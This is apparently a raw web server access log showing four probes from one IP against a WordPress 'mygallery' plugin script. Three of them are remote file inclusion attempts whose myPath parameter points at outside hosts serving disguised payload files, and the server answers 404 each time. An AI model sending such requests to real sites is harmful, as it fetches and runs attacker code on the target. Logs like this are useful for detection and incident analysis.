202.150.216.211 - - [14/May/2012:07:24:55 +0200] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=test?? HTTP/1.1" 404 344 "-" "Mozilla/5.0 (X11;U;Linux i686 (x86_64);en-US;rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
202.150.216.211 - - [14/May/2012:07:24:56 +0200] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://novotempolivraria.com.br/loja/capek/idrfi.txt?? HTTP/1.1" 404 344 "-" "Mozilla/5.0 (X11;U;Linux i686 (x86_64);en-US;rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
202.150.216.211 - - [14/May/2012:07:24:57 +0200] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://202.150.216.211/~admin/joomlatest/components/com_search/views/search/tmpl/fuckyou/daster.jpg?? HTTP/1.1" 404 344 "-" "Mozilla/5.0 (X11;U;Linux i686 (x86_64);en-US;rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
202.150.216.211 - - [14/May/2012:07:24:58 +0200] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://202.150.216.211/~admin/joomlatest/components/com_search/views/search/tmpl/fuckyou/j2.jpg?? HTTP/1.1" 404 344 "-" "Mozilla/5.0 (X11;U;Linux i686 (x86_64);en-US;rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
